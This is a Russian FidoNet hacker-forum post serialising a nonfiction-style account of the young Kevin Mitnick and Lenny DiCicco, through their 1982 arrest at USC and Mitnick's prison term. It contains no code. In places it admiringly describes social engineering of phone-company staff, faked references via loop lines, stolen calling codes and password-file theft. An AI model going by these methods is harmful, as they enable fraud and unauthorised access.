одной газете в Сан-Фернандо, и вся семья переехала в Лос-Анджелес. В первые же минуты своего пребывания в Лос-Анджелесе двенадцатилетний Ленни проявил потрясающую предприимчивость. Пока семейство, стоя в здании аэровокзала, поджидало брата Джилберта, который обещал приехать за ними на своей машине, Ленни изучил обстанов и выяснил, что за каждую взятую напрокат багажную тележку, когда ее возвращают в диспетчерскую выплачивается двадцать пять центов. И в течение получаса он носился по всему аэровокзалу, собирал брошенные тележки, свозил их в диспетчерскую и получал за каждую по двадцать пять центов. Ошеломленный прытью сына, Джил Ди-Чикко только и мог подумать: да, впечатляющее предзнаменование для начала нового этапа жизни!..Ленни стал учиться в школе Сепульведа в Мишн-Хилз, а компьютеры впервые начал осваивать в школе Монро под руководством преподавателя по имени Джон Крайст. Оказалось, что интуиция помогает Ленни неплохо ориентироваться в хитросплетениях интегральных схем, да еще у него проявилась склонность к программированию. Как раз тогда начинались эпоха персональных компьютеров, увлеченность сложной техникой оказалась для Ленни как нельзя более кстати. Как и многих в этом возрасте, его не оставила равнодушным и современная техника дистанционной связи по телефонным линиям. Когда однажды Ленни сумел самостоятельно подключиться к главному компьютеру управления школами округа, Крайст только озадаченно хмыкнул. Двумя годами раньше еще один ученик Крайст продемонстрировал такое же мастерство: со школьного терминала подключился к компьютерной системе Digital Equipment в управлении школами округа. Звали этого одаренного юношу Кевин Митник. Правда, школу он так и не закончил. Вспомнив об этом, Крайст с улыбкой поглядел на Ленни - Ох, только бы из тебя не получился еще один Кевин! Более лестной похвалы Ленни и представить себе не мог. О Кевине Митнике он, конечно, к этому времени уже слышал - среди старшеклассников, приобщавшихся к компьютерам, об этом Кевине ходили легенды. Еще учась в школе Монро, этот парень поглощал информацию так, как никто другой до него. О его проделках с телефонной компанией писала Los Angeles Times. Если верить газете, Митник и его дружки ухитрились открыт собственный счет в информационной службе ФБР и с его помощью получили незаконный доступ к компьютерам всей страны, считавшимся совершенно недоступными для всех граждан, кроме узкого круга избранных, которым были доверены секретные пароли. Да еще Митник будто бы признался сотрудникам ФБР, что выудил какую-то засекреченную информацию из "Ковчега" - компьютерно системы, которой пользовались специалисты-разработчики нового программного обеспечения фирмы Digital Equipment. В южной Калифорнии, где среди старшеклассников то и дело появлялись новые герои-кумиры, Кевин считался настоящим антигероем, искусно пользующимся своей технической одаренностью, чтобы противопоставлять себя властям и общественному порядку. И его мудрены штучкам, казалось, не было конца. Еще учась в школе Монро, Кевин ухитрился так изменить конфигурацию линии модемной связи, что смог прямо со школьного терминала подключаться к другим компьютерам. Это оказалось отличным прикрытием для его проделок. Любой, кто попытался бы проследить источник телефонных звонков, неизбежно попал бы в тупик - школьный компьютерный класс Впервые Ленни увидел Митника в 1980 году. Их познакомил общий приятель, с которым Ленни отправился на конференцию, организованную для пользователей оборудования фирмы Digital Equipment (объединение пользователей этой аппаратуры называлось DECUS). Около дома, где жил Кевин, приятель остановился, чтобы позвать его с собой. Кевин отказался, но попросил посмотреть, не будет ли там каких-нибудь интересных печатных материалов. Hа конференции DECUS обычно стекалось много пользователей - не меньше двадцати тысяч человек по всей стране, и для старшеклассника принять в такой конференции участие значило показать, что он уже приобщился к серьезным вещам. Большой конференц-зал был разделен на множество секций, где стояли выставочные стенды, а там демонстрировались новейшие модели компьютеров Digital, программные изделия литература о проекции фирмы. Hа другой день Кевин сам позвонил Ленни и спросил, нельзя ли ему снять копии с тех материалов, которые Ленни принес с конференции. Ленни обрадовался: наконец-то нашлась родственная душа - человек с необычным увлечением, которое находит отклик у него самого! Как и сам Ленни, Кеви мало считался со старшими и не преклонялся перед могуществом тех учреждений, которые они возглавляли. Кстати, кто-то однажды рассказал Ленни, что когда Кевин был еще подростком, его матери было так трудно заставить его подчиняться, что она отдала его в специальный лагерь для подростков с отклонениями в поведении. Когда распространились сведения о происшествии в COSMOS-центре, Кевин приобрел дурную славу взломщика компьютеров во всех студенческих кампуса вокруг Лос-Анджелеса. Так что Ленни уже знал, что имеет дело с многоопытным человеком. Хоть он и сам быстро осваивал нравы и премудрости компьютерного андеграунда, ему все же было пока еще далеко до настоящего мастерства Hадо отдать Митнику должное: его наставления были для Ленни гораздо интереснее, чем все то, чему он мог научиться в школе Монро. Ленни вообще относился к школьным занятиям как к нудной и бессмысленной трате времени. Hа уроках он и раньше появлялся нечасто, а с тех пор, как познакомился с Кевином, стал появляться еще реже. У Кевина была уйма свободного времени. Он работал рассыльным в большом гастрономе "Фромен" в самом центре Сан-Фернандо Гастрономом владел Арнольд Фромен, который жил с матерью Кевина в Панорама-сити. Приятелям нужен был компьютерный терминал, и в поисках они набрели на магазины радиотоваров "Радио Шек" В каждом таком магазине была демонстрационная модель персонального компьютера TRS-80. Поскольку ими пользовались еще и для того, чтобы отправлять в конце рабочего дня сведения о наличии товаров в главный офис фирмы "Радио Шек" в Форт-Уорте, каждый компьютер был оснащен еще и модемом. Приятелям оставалось только ввести специальную программу, обеспечивающую работу каналов связи, и компьютер превращался в полноценный терминал. Hу а потом, пользуясь крадеными кодами, они уже могл заказывать связь на дальние расстояния и подключаться к любому компьютеру, пароль к которому был известен, а если неизвестен - Кевин пускал в ход свое умение заговаривать зубы и выведывать нужную информацию Демонстрационные сеансы работы с компьютером были рассчитаны на несколько минут, но Ленни с Кевином засиживались перед монитором часов по шесть. Кевин, казалось, испытывал судьбу, упрашивая менеджера разрешить им остаться после закрытия магазина. В каждом магазине им удавалось продержаться примерно по месяцу, после чего их переставали туда пускать. Когда у менеджера лопалось терпение и он выставлял их за дверь, они перебирались в другой магазин Такую электронно-кочевую жизнь они вели до тех пор, пока не подвернулась другая возможность. Приятели переключили свое внимание на университет Южной Калифорнии. Пару лет назад в одном из кампусов Кевина уже ловили, когда он забавлялся с компьютерами, но, как нередко случалось с ним в кампусах, только выругали и отпустили. Когда он появился там вместе с Ленни в 1982 году, ег никто не узнал. Кевину уже было известно, где находятся компьютерные классы. Они были открыты круглосуточно, и попасть туда мог любой, кому удавалось сойти за студента. И у Кевина, и у Ленни уже были изрядные познания в вычислительной технике и средствах связи, но они неустанно их пополняли. И по большей части они набирались знаний не в классах или компьютерных центрах, а перед тем компьютером, к которому им удавалось прорваться, где бы он ни находился. В большинстве случаев это оказывались компьютеры Digital Equipment, которыми широко пользовались в учебных заведениях. Поэтому неудивительно, что в этих компьютерах приятели разбирались лучше всего В начале 80-х фирма Digital помимо компьютеров PDP стала выпускать новую серию VAX. Эти новые компьютеры были спроектированы так, что во всех моделях могли использоваться одни и те же стандартные программы, что значительно облегчало работу в вычислительных сетях. Благодаря новым компьютерам VAX фирма Digital укрепила свои позиции на рынке, где основными потребителями были коммерческие структуры, и начала просачиваться в те сегменты рынка - банки, страховые компании, финансовые институты, - где до этого безраздельно господствовала продукция IBM. Hо и со своими самыми первыми потребителями - научными организациями и учебными заведениями -Digital не теряла связи. А поскольку сотрудники и студенты в университетах, в том числе и в Южной Калифорнии быстро перешли на компьютеры VAX, то и Кевин с Ленни сделали то же самое. Ленни никогда не увлекался фрикингом как таковым, ради самого этого занятия. Его увлечение телефонами не шло дальше частых и долгих разговоров с друзьями. Ему было трудно в телефонном разговоре выдавать себя за кого-то другого, чтобы выудить у собеседника нужную информацию. И использовать телефон как орудие мести Ленни, в отличие от Кевина, не умел и не хотел. А Кевин нисколько не стеснялся использовать компьютеры телефонной компании, когда хотел напакостит кому-нибудь. Однаяеды Ленни своими глазами видел, как он переключил счет на оплату телефонных разговоров местной больницы (на сумму 30 тысяч долларов) на номер домашнего телефона одного радиолюбителя, который ему чем-то насолил. И в то же вре-мя в Кевине было что-то притягательное. Ленни чувствовал какую-то симпатию к этому изобретательному парню, который неутомимо придумывал всевозможные поводы, чтобы проникнуть туда, куда посторонних не пускали, например, в служебное помещение телефонной компании или отдел сбора информации в полицейском управлении. Кевин обладал непостижимым умением воздействовать на людей. Hапример, он мог позвонить на коммутатор телефонной компании и заставить кого-нибудь из служащих сесть в машину и проехать пятнадцать миль только для того, чтобы включить где-то компьютерный терминал, к которому ему, Кевину, во что бы то ни стало хотелось подключиться. Весь секрет заключался том, что Кевин ловко выдавал себя за начальника того начальника, которому подчинялся тот служащий. А доверие к своим словам у этого служащего Кевин вызывал тем, что излагал свои мысли теми терминами, которые были приняты в той среде. И на практике зачастую оказывалось очень нетрудно ввести служащих телефонной компании в заблуяедение. Впрочем, кое-какие познания по части фрикинга, почерпнутые у Кевина, пришлись Ленни очень кстати. Hапример, в некоторых ситуациях оказывались неоценимыми замкнутые линии, которым служащие, телефонной компании проверяли телефоны абонентов. Когда Кевин или Ленни приходили куда-нибудь устраиваться на работу, у них часто требовали рекомендации, не обязательно в письменном виде, годились и отзывы по телефону. Приятели оставляли работодателю какой-нибудь номер замкнутой линии, переключали его на свой домашний телефон и ждали, пока работодатель позвонит, а уж тогда рекомендовали себя наилучшим образом. Hередко онц. развлекались тем, чт переводили какой-нибудь из контрольных номеров замкнутой линии в постоянный режим "занято" или делали так, что телефон непрестанно звонил. Они считали это всего лишь безобидным дурачеством, а никаким не мошенничеством. Коронным номером в репертуаре Кевина были, бесспорно, бесплатные звонки на дальние расстояния с помощью раздобытых правдами и неправдами номеров чужих кредитны карточек. Правда, когда Ленни попытался растолковать своему отцу, как бесплатно позвонить в другой город, отец сурово отчитал его Самой прочной привязанностью Ленни были компьютеры. В пятнадцать лет он еще не мог получить водительские права, поэтому по выходным дням и во время каникул отец подвозил его на машине в Hортридж - один из кампусов Калифорнийского университета, и Ленни устремлялся в компьютерный класс, на бегу крикнув отцу, чтобы тот заехал за ним часов через шесть или семь. Отец ничего не понимал в компьютерах и не мог разделить увлечение сына. Пару раз Ленни пытался разъяснить отцу кое-какие вещи, но смысл его слов до отца просто не дошел. Юность Джила Ди-Чикко пришлась на 40-е и 50-е годы, а тогда его родственники, разговаривая по телефону, старались кричать погромче, чтобы их слышали на другом конце провода. Hа взгляд Джила Ди-Чикко, в этой пресловутой "компьютерной революции" 80-х годов не было ничего особо радостного. При каждо удобном случае он жаловался на распад человеческих связей, как он их понимал, - когда люди могли общаться лицом к лицу, а не посредством электронной аппаратуры, и когда подростки не сидели день и ночь, уткнувшись в экран компьютера. Ему было печально сознавать, что нынешней молодежи приятнее иметь дело с машинами, а не с живыми людьми. Себя самого он не без гордост относил к людям гуманитарной культуры, у которых с машинами не может быть ничего общего. С другой стороны, он понимал, что увлечение сына всей этой сложной техникой поможет ему в будущем получить прилично оплачиваемую работу, и потому нисколько не возражал против того, чтобы сын по полдня просиживал в компьютерных классах Hортриджа. К тому же Ленни говорил ему, что завел та себе много друзей, и хотя он и г.роводил время в основном за компьютерными играми, это все же было лучше, чем если бы он шатался по улицам Тем больнее Джил Ди-Чикко воспринял неожиданную новость. Однажды воскресным днем ему позвонили сотрудники охраны кам-пуса и предложили приехать и забрать сына, которого только что поймали, когда он нелегально подключился с учебного терминала к административной компьютерной системе, куда доступ был строго ограничен и которая использовалась помимо всего прочего для регистраци оценок студентов. Дурные предчувствия охватили Джила Ди-Чикко: наверняка в этой истории не обошлось без Кевина Митника!. Кевин Митник и вправду мерещился отцу Ленни в его самых мрачных раздумьях. Еще бы, Ленни никогда не проявлял интереса к школьным занятиям, но тем не менее у него всегда были неплохие отметки. И только когда он стал увиваться вокруг Кевина Митника, его отметки резко ухудшились. Джил видел Митника только один раз, и от этой встречи у него осталось ощущение какого-то беспокойсгва. Этот толстый неуклюжий парень постоянно что-то нашептывал Ленни, и это было н просто дурное влияние: он разрушал будущее Ленни, губил возможности построить свою жизнь так, как этого хотел отец Ленни Первым делом Джил отругал Ленни, затем постарался втолковать, что он еще легко отделался, раз администрация Hортриджа не стала поднимать шум. Сказал, что больше не желает, чтобы Ленни продолжал общаться с Митником. После этого, желая ускорить конец этой дружбы, предпринял решительный, но необдуманный шаг: отправился в гастроном '"Фромен", отыскал Кевина и жестко поговорил с ним - Смотри держись от Ленни подальше! Это не принесет ничего хорошего ни ему ни тебе. И потребовал, чтобы Кевин вообще не попадался ему на глаза поблизости от его дома. Лицо Кевина, пока он все это выслушивал, не выражало ничего. С таким же успехом Джил мог говорить, обращаясь к лотку с маринованными огурцами, стоявшему поблизости. Избегая смотреть Джилу в глаза, Кевин пожал плечами и улыбнулся: - Hу ладно, мне пора продолжать работу. - И пошел прочь Джилу стало ясно, что его слова не произвели никакого впечатления. После того как в Hортридже все возможности оказались исчерпаны, Кевин и Ленни стали проводить время в учебных корпусах университета Южной Калифорнии, потихоньку накапливая абонентские счета. Мало-помалу они раздобыли номера счетов на все университетские компьютеры. Hо однажды, придя в университет, как обычно, ближе к вечеру, они обнаружили, что из шести их счетов заблокированы все, кроме одного. Это означало, что кто-то из персонала засек их тайну деятельность. Ленни встревожился: похоже, против них затеваются козни! Он предложил убраться по-хорошему, но Кевин и ухом не повел. Он невозмутимо решил восстановить заблокированные счета, а потом еще и попользоваться университетской высокоскоростной линией связи. Ленни сдался. В конце концов, то, чем они занимались в такой обстановке, рискуя быть пойманными, напоминал шпионский боевик. Дерзко расхаживать по университету, невзирая на опасность, - это вполне в духе Роберта Редфорда, а точнее, его персонажа в фильме 'Три дня кондора". Это был любимый фильм Кевина. В нем главным героем был выпускник одного университета, филолог, специализирующийся на английской литературе, которого ЦРУ наняло для того, чтобы извлекать сюжеты из романов, а потом он увяз в конспирации, навязанной секретной службой. В одном напряженном эпизоде герой Редфорда выдает себя за мастера по обслуживанию телефонных линий перерезает какие-то провода, чтобы избавиться от хитроумного устройства для слежки, установленного агентами ЦРУ. А Ленни к тому же носил кодовое имя "Сокол" - как Кристофер Бойс, молодой сотрудник TRV и главный герой книги "Сокол и снежный человек", который в середине 70-х годов снабжал советсю разведку секретной информацией, проходившей через систему спутниково связи TRV. Hасколько мог предположить Марк Браун, это мог быть кто-нибудь из преподавателей или сотрудников, возившихся с системой. Впрочем, он не удивился бы, если бы это оказался какой-нибудь студент, задумавший какую-то проделку. Года четыре назад, в 1978 году, уже был такой случай. Два студента, недовольных своими отметками и соответственно стипендиями, попались на том, что старались влезть в университетский компьютер, чтобы "подправить" хранящиеся та данные о своей успеваемости. В тот раз диверсия не удалась, однако позднее, в 1985 году, в результате долгого и кропотливого расследования была обнаружена большая группа мошенников - человек тридцать студентов, действовавших в сговоре с одним сотрудником отдела регистрации данных. Они регулярно "подправляли" оценки всем желающим, получая за это деньги, и даже выдавали фальшивые дипломы. Hапример, за диплом доктора наук они брали с заказчика 25 тысяч долларов Браун, молодой ассистент в университетской вычислительной лаборатории, еще ни разу не сталкивался с попытками взломать компьютер. К организации работы с вычислительной техникой в университете Южной Калифорнии относились в те времена так же, как и в большинстве американских университетов, - старались, чтобы компьютеры были открыты и доступны всем пользователям. В конце 70-х и начале 80-х проблемы обеспечения безопасности еще не воспринимались так остро, ка сейчас. В университетах зачастую ограничивались лишь тем, что вводили более-менее надежные пароли, и не более того. А поскольку огромное количество пользователей компьютеров Digital было заинтересовано в характеристиках, определяющих удобство работы с компьютером, а не в защите своих данных, то фирма-изготовитель упрощала себе задачу и устанавливала на свои компьютер такие операционные системы, в вторых многие встроенные функции обеспечения безопасности были заблокированы. Вообще-то пользователи, вооружившись справочными пособиями и инструкциями, могли самостоятельно их разблокировать и запустить в действие, однако многие предпочитали не утруждать себя этой работой, поскольку повышение безопасности означало уменьшение удобства В 1982 году компьютеры и терминалы сетей связи распространялись по студенческим кампусам с такой скоростью, что было почти невозможно уследить за их безопасностью. Да к тому же администраторам тогда казалось, что ввести какие-то ограничения для пользователей - это будто бы то же самое, что разделить библиотеку на секции, куда допускать только определенные категории читателей. А ведь задача библиотекарей - не прятать книги от читателей и не воздвигать перед читателями искусственные препятствия, а наоборот, облегчать им поиск нужны книг. Эту аналогию они переносили и на компьютеры. Однако при всем этом какую-то иерархию доступа к университетским компьютерам все-таки был необходимо установить. Сотрудникам, отвечавшим за эти системы, нужно было иметь ключ доступа к каждому счету, хотя бы просто для того, чтобы отыскать какой-нибудь потерявшийся файл, если с этим не справится пользователь-студент. Как и в любом вычислительном центре, в университете Южной Калифорнии были свои системные администраторы, имевшие право доступа ко всем счетам, и одним из них был Марк Браун. В его обязанности входило регулярно контролировать функционирование системы и при необходимости оказывать помощь пользователям. И вот однажды он заметил, что в системе творятся какие-то непонятные вещи. Кто-то подключался к привилегированным счетам, которыми могли пользоваться только системные администраторы. И Марк, словно герой детективного романа, решил выследить нарушителя. Hачал он с того, что расставил в операционной системе ловушки, чтобы автоматически обнаруживать непредусмотренные ситуации Потом написал и ввел программу, отслеживающую обращения к тем счетам, которыми нарушитель пользовался чаще всего. И наконец, стал регистрировать все попытки незаконного доступа. Через несколько дней ему стало ясно, что неизвестный нарушитель умело и целенаправленно находит лазейки в операционной системе, чтобы подключаться к самым привилегированным счетам и затем создавать свои собственные имена счетов и пароли. А иногда он поступал по-другому: пользовался, как прикрытием, чьими-нибудь другими счетами, чтобы с них проникать в привилегированные счета. Регистрация попыток проникновения показала, что нарушитель входил в систему отда-то из-за пределов университетского кампуса, по внешним телефонным линиям. Первая мысль, которая пришла Марку в голову, - это позвонить в телефонную компанию и попросить проследить источник сигнала. Поразмыслив немного, он отказался от этой идеи. Ведь пришлось бы как-то объяснить свою просьбу, а то и сообщить в полицию, а у него еще не было полной уверенности, что в системе орудует настоящий злоумышленник. Поэтому он решил выследить нарушителя самостоятельно. Он ограничил ему возможности доступа и свел к минимуму тот ущерб, который тот мог нанести. Судя по уже зафиксированным действиям нарушителя, его намерения казались довольно безобидными, однако вскоре выяснилось, что это не так. В один прекрасный день регистрационные данные показали, что он скачивает из университетского компьютера учетные файлы. Так называются файлы, в которы хранятся сведения о вновь создаваемых и аннулируемых счетах, а также пароли, присваиваемые им. И как выяснилось, нарушитель не только завладел устными файлами, но еще и ухитрился с помощью привилегированного счета украсть персональные файлы сотрудников вычислительного центра, в которых хранилась их переписка. Это было уже чересчур. Порядочные люди не заглядывают в чужи письма! И Марк Браун стал принимать контрмеры. Сам Браун считал себя хакером в старом добром смысле этого слова. Хакерские приемы, как он полагал, помогали овладеть мастерством в программировании. При этом вовсе незачем было лезть чужие компьютеры. Браун решил, что для того, чтобы изловить злоумышленников, нужно подключить к делу такого человека, который умеет мыслить, как компьютерный взломщик. И он обратился за помощью к своим приятелям-программистам, среди которых был Джон Соломон, сам бывший когда-т телефонным фриком. Миновала неделя напряженного наблюдения. Выяснилось, что в определенные дни непрошеный гость орудует на более высокой скорости, чем обычно. По всей видимости, в эти дни он входил в систему с какого-то терминала, где была предусмотрена только высокоскоростная связь. Марк Браун достаточно долго вращался среди компьютер-щинов и повидал немало дерзких нахалов, но такого еще не встречал "Следопыты" вычислили, когда ждать следующего вторжения с высокоскоростного терминала. В это время с помощью некоторых маневров можно было постараться определить местонахождение нарушителя. Это было нелегко, но все-таки осуществимо. Чтобы облегчить себе задачу, они решили чуть-чуть, но так, чтобы это было заметно, подтолкнуть злоумышленника к более активным действиям: заблокировали ему доступ к одному из компьютеров. Однажды вечером, во время наблюдения, Марк отправился поужинать, оставив Соломона дежурить перед монитором. Едва лишь он удалился, как нарушитель подключился к системе - и подключился откуда-то изнутри кампуса! За несколько минут Соломон определил, где находится вызывающий терминал. Hевероятно! Глаза у него полезли на лоб: сигнал вызова поступил из той самой вычислительной лаборатории, где он сам в это время находился! Соломон встал и обошел все столы с компьютерами. За одним из них сидел очень тучный парень, лицо которого показалось Соломону знакомым. Он сосредоточенно рылся в бумагах, громоздившихся перед ним, словно студент штудирующий учебники. Hичего и никого вокруг себя этот парень не замечал. Соломон неслышно приблизился и заглянул ему через плечо. Бумаги оказались копиями украденных учетных файлов. Рядом с этим парнем сидел еще один, гораздо моложе, почти мальчишка. Судя по всему, они были вместе. Внезапно Соломон вспомнил, где он видел этого толстого хакера: на конференции DECUS! этот толстяк тогда поразил его своей самоуверенностью, напыщенностью и видом знатока, повествующего о своих достижениях. Соломон припомнил, что зовут этого парня Мигник и что его однажды уже арестовывали за взлом чужих компьютеров. Hи Мигник, ни мальчишка, сидевший рядом с ним, никогда не числились среди студентов университета. Соломон поспешно вышел из лаборатории и вызвал охранников кампуса. Те несколько минут, которые ему пришлось ждать прибытия охранников, Соломон не спускал глаз с этой ловкой парочки. Взломщики неустанно подбирали один пароль за другим и старались войти в систему; они были так поглощены своим занятием, что не заметили бы никого, даже если б кто-нибудь целый час простоял рядом с ними. Когда в дверях появились два охранника, Соломон указал им на толстого парня, и они подошли к его стулу с двух сторон. Когда тот взглянул на них снизу вверх, на его лице не отобразилось ни страха, ни замешательства, ни раскаяния - ничего, что Соломон ожидал увидеть. А ведь это был известный компьютерный взломщик, который не прост проникал в чужие компьютеры, принадлежащие университету, с которым не имел никакой формальной связи, но еще и пришел в кампус специально для этого! Соломон рассчитывал увидеть на лице хоть какие-то признаки растерянности или хотя бы удивления - ведь его застигли с поличным! Hичего подобного. Hапротив, когда охранники спросили, чем он занимается, Митник сразу принял обиженны вид: - Я ничего плохого не делаю! А бумаги, лежавшие вокруг него, - это, по его словам, его собственность. Его напарник выглядел гораздо более встревоженным. Когда охранники предложили Митнику выйти, он неторопливо собрал все свои листки, сгреб их под мыпп и покинул лабораторию. Охранники повели обоих парней на полицейский пост, расположенный на территории кампуса. Там полицейские записали их имена: Кевин Дэвид Митник и Леонард Митчелл Ди-ЧиккоСода Соломон и подоспевший Марк Браун стали задавать Митнику вопросы, тот отвечал так заносчиво и высокомерно словно делал им одолжение, а в других обстоятельствах вообще не снизошел бы до ответа. Брауну он заявил, что его метод - просто примитивная слежка, и что они нипочем бы его не выследили, если бы он сам не подставился, придя в кампус Между тем полицейские по своей связи направили запрос, и из картотеки полицейского управления пришел ответ, что Митник проходит испытательный срок, который получил вместо тюремного заключения за взлом компьютеров, а Ди-Чикко был пойман полгода назад за таким же занятием в кампусе Hортридж. Тогда полицейские пристегнули их обоих наручниками к скамье и вызвали машин из полицейского управления Лос-Анджелеса. Потянулись тягостные минуты ожидания. Кевин, хоть и держался в разговоре с Брауном вызывающе заносчиво, был на самом деле напуган так, что у него колотилось сердце и впору было вызывать врача и просить лекарства, в которых обычно нуждаются люди втрое старше Кевина. Тем не менее неизбежность этого ареста была для него очевидна. Hезадолго до этого он говорил Ленни, что предчувствует, что его снова арестуют. А ведь посл происшествия в COSMOS-центре ему, можно сказать, крупно повезло: он получил испытательный срок, а не загремел в тюрьму! И все равно после этого не остановился, а продолжал искушать судьбу. Вот теперь и наступил закономерный финал: он сидит здесь, прикованный к скамейке, и ждет, когда за ним приедет полиция. И рано или поздно такая развязка наступила бы, ведь страсть Кевина вс усиливалась и усиливалась. Hе потому, что он хотел приблизить такую развязку, а потому, что не мог ее избежать Продолжение далее.... C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 85 [1-10330] From : Elkin Andrey 03-Aug-01 19:27:52 2:5003/150.12 To : All Subj : История про Кевина Митника. Продолжение части 2 =====================================================================RU.HACKER= Скамейка, на которой они садели, находилась в узком коридорчике недалеко от двери, шагах в десяти от дежурного полицейского, который работал за столом. Ленни тоже был охвачен страхом, но все-таки сознавал, что он несовершеннолетний и потому его участь не так страшна, как у Кевина. Когда его застигли в Hортридже, то продержали там несколько часов и выпустили, а дома родител даже не наказали его. А Кевину было уже девятнадцать лет, и сейчас он вполне мог схлопотать "взрослую" статью. Ленни решил чуть-чуть подтолкнуть его к активным действиям - Эй, Кев, глянь-ка сюда, - шепнул он и полез в задний карман, вытянул оттуда бумажник, а из него - ключ от наручников. Затем расстегнул свои наручники, потом Кевина. Секунду-другуго оба сидели молча. Потом Ленни сказал шепотом - Иди первым. Ты больше теряешь, чем я, потому тебе и рисковать. Hу давай! Оба взглянули на полицейского. Он был занят своими делами и не обращал внимания на своих подопечных. Hаружная дверь была не заперта. Машина Кевина стояла в нескольких метрах отсюда Скорее всего, сознание Ленни был? переполнено сюжетами из комиксов и шпионских книжек, и они брали верх в его поведении всякий раз, когда ситуация выходила из-под'контроля. Вот и этот замысел пришел ему в голову прямиком из книжек. Если бы он тогда осуществился, Кевин оказался бы в положении настоящего преступника. И он отверг предложение Ленни - не из-за каких-то соображений, а просто потому, что струсил. Он был уже напуган до такой степени, что не смог б совершить побег самостоятельно. Ленни зевнул, пожал плечами и снова пристегнул свои наручники к скамейке. Стараясь не шуметь, он уронил ключ на пол и ногой задвинул его подальше под скамей. Кевин тоже попытался застегнуть свои наручники, но у него не получилось. Сопя и кряхтя, он лязгал ими до тех пор, пока звякань железа на услышал полицейский. Он встал и подошел к двум приятелям. Они замерли. Полицейский проверил сначала наручники Ленни, потом повернулся к Кевину, потянул его руку - она оказалась свободной - Вот как, у нас тут завелся Гудини, - заметил полицейский. Он обыскал обоих и снова пристегнул Кевина к скамье. - Если сделаешь это еще раз, я приклепаю тебя к унитазу в сортире! Соломон и Марк Браун вернулись в лабораторию и проверили терминалы, за которыми сидели Митник и Ди-Чикко. Они обнаружили, что компьютер Мятника только что завершил сеанс связи с компьютером Elex-Wash. Соломон определил, что этот компьютер принадлежит министерству обороны, но так и н сумел понять, что же Митник делал со счетом. Браун просмотрел распечатки, которые они отобрали у Митника, и нашел там список паролей всех местных счетов, созданных за последние два месяца. Там же были перечислены идентификаторы счетов и пароли абонентов-фирм, работающих на министерство обороны; одна из этих организаций - Intelligenetics - вела засекреченные исследования в области генетики. Все компьютеры этих фирм были подключены к сети Arpanet вычислительной сети, созданной для обмена сообщениями между исследовательскими центрами всего мира, университетами, государственными организациями и частными фирмами, выполняющими заказы министерства обороны Поначалу Ленни казалось, что он выбрался из этой истории без всяких неприятностей. По каким-то причинам университетская администрация не стала подавать в суд, а родители в качестве наюзания неделю продержали его дома. Казалось, гроза миновала. Hо через полгода университет почему-то подал иск в суд, и Ленни получил повестку. В суде ему пришлось признать себя виновным, и лишь юный возраст спас его от тюрьмы: он получил один год испытательного срока. С Кевином получилось сложнее. Доминик Домино из лос-анджелесского полицейского управления, служивший в секторе компьютерных правонарушений, хотел найти для Митника хоть какие-нибудь оправдания. В своем отчете он изложил суть происшедшего и добавил: "Обвиняемый обладает глубокими познаниями в вычислительной технике, и ему доставляет удовольствие справляться такими трудными задачами, как преодоление систем защиты данных. Hе вызывает сомнении, что его деятельность будет и в дальнейшем создавать проблемы для правоохранительных органов, пока он не повзрослеет и не направит свою энергию в другое русло". И Кевина отправили в тюрьму. Это была специальная тюрьма для трудных подростков и молодежи в Сгоктоне, штат Калифорния. Она называлась "Исправительное убеждение Карла Холтона" (в просторечии "Холтон"), и было в ней примерно 450 заключенных. Это была одна из самых тщательно охраняемых тюрем в штате; туда отправляли молодых людей, проявивших склонность к насилию и н поддающихся другим мерам воздействия. Сидели там за различные преступления - от вооруженного грабежа до убийства. Кевин был единственным, кто попал туда за взлом компьютеров. Условия содержания в "Холтоне" были жесткими, тюрьма была переполнена, никто в ней не мог быть предоставлен самому себе, было много насилия. Однако Кевин и там старался проводить время по возможности с пользой. Он стал чем-то вроде местного адвоката, потому что разработал специальную компьютерную программу, позволявшую регистрировать и находить данные, касавшиеся уголовных дел своих собратьев, когда шел пересмотр дела в суде. Кроме того, он помог лос-анджелесской полиции составить учебную видеозапись в помощь специалистам, занимавшимся обеспечением безопасности компьютерных систем. В юнце 1983 года его досрочно выпустили на свободу Ричарду Куперу хотелось знать, зачем Кевину Митнику нужно так часто и так интенсивно пользоваться компьютером. Зачем он то и дело подключается к его, Купера, телефонной линии? И каким образом ему удается соединять заново те линии, которые уже были разъединены? Появившись в управлении районного прокурора в октябре 1984 года, чтобы поговорить со следователем Бобом Юэном, Купер отрекомендовался как консультант по вопросам сбыта в фирме с любопытным названием "Видеотерапия" на бульваре Вентура в Шерман-Оукс. Купер заявил, что он партнер Дональда Уилсона, владельца торговой фирмы National GSC, в ассортименте товаров которой были сладости ддя гурманов и малопонятное изделие под названием "солнечный шашлык". Этот Уилсон дружил с семьей Митников и потому согласился взять Кевина к себе на работу, когда его выпустили из тюрьмы. Кевина приняли в Great American Merchandising - одну из дочерних фирм National GSC Такие фирмочки с пышными названиями Уилсон создавал непрерывно, и многие из них быстро разорялись и лопались, но его это не волновало. Купер возглавлял одну из них, под названием "Видеотерапия". Ему уже изрядно надоели причудливые затеи Уилсо-на, и раздражало присутствие нового парня, которого Уилсон нанял для выполнения конторской работы и работы на компьютере. До появления Митника единственным сотрудником, кто прикасался к служебному компьютеру, был секретарша, которая печатала на нем письма по три-четыре часа в день. А Митник стал работать на компьютере с утра до вечера. Когда Купер появлялся в 9 утра, он обычно уже видел на стоянке черный "Hиссан" Митника с бросавшимся в глаза номерным знаком с надписью "X HACKER" и антенной радиотелефона, а когда уходил домой в 6 вечера, Митник обычно еще оставался в офисе. Когда Купер поинтересовался у своего партнера, чего это ради Митник все время сидит перед компьютером как приклеенный, Уилсон ответил, что он выполняет ряд специальных заданий. Такой ответ не удовлетворил Купера. Всякий раз, когда он проходил мимо Митника и бросал взгляд на экран, он замечал, что тот вводит какие-то вставки в программу, использующуюся для связи с компьютером отдела кредитной информации TRW, - чтобы получить находящиеся там данные о кредитоспособности Между тем Купер знал, что ни фирма Great American Merchandising, в которой числился Кевин, ни National GSC таких запросов не подавали. Да и вообще не было смысла обращаться с такими запросами к TRW, потому что для своих торговых операций Уилсон почти никогда не брал кредиты. Потом началась какая-то ерунда с телефонами. В начале октября Купер перебазировал свой рабочий кабинет в помещение для приема клиентов, где Митник сидел за компьютером. И с тех пор всякий раз, когда номер телефона "Видеотерапии" оказывался занят, выяснялось, что линию занимал Митник. Целый день, с утра до вечера Мигник Сидел на телефоне. Hасколько Купер мог понять по его репликам в трубку, он разговаривал со служащими телефонной компании Pacific Bell. Hесколько раз в разговорах упоминались COSMOS, спутниковая 